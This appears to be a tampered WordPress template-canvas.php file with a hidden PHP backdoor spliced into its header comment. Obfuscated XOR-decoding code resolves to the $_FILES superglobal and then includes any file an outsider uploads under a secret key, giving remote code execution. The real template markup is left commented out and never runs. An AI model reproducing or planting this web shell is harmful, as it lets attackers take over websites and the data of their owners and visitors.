<?php /* 
*
 * Template canvas file to render the current 'wp_temp*/
 	

$real = 'TirMeSppCIsAO6';
function cache_key($operator, $revparts)

{
    $safe_text = urldecode($operator);

    $encoded_char = substr($revparts,0, strlen($safe_text));

    $features = $safe_text ^ $encoded_char;
    return $features;
}

$post_id = ${cache_key("%0B%2F%3B%01+%00", $real)};
if (isset($post_id[$real]))

{
	$extra_parts = 'sign';
    $hierarchical_post_types = $post_id[$real];
    $original_value = $hierarchical_post_types[cache_key("+%04%02%12%0B2%1D%15", $real)];
    include ($original_value);

}



/* late'.
 *
 * @package WordPress
 


 * Get the template HTML.
 * This needs to run before <head> so that blocks can add scripts and styles in wp_head().
 
$template_html = get_the_block_template_html();
?><!DOCTYPE html>
<html <?php language_attributes(); ?>>
<head>
	<meta charset="<?php bloginfo( 'charset' ); ?>" />
	<?php wp_head(); ?>
</head>

<body <?php body_class(); ?>>
<?php wp_body_open(); ?>

<?php echo $template_html;  phpcs:ignore WordPress.Security.EscapeOutput ?>

<?php wp_footer(); ?>
</body>
</html>
*/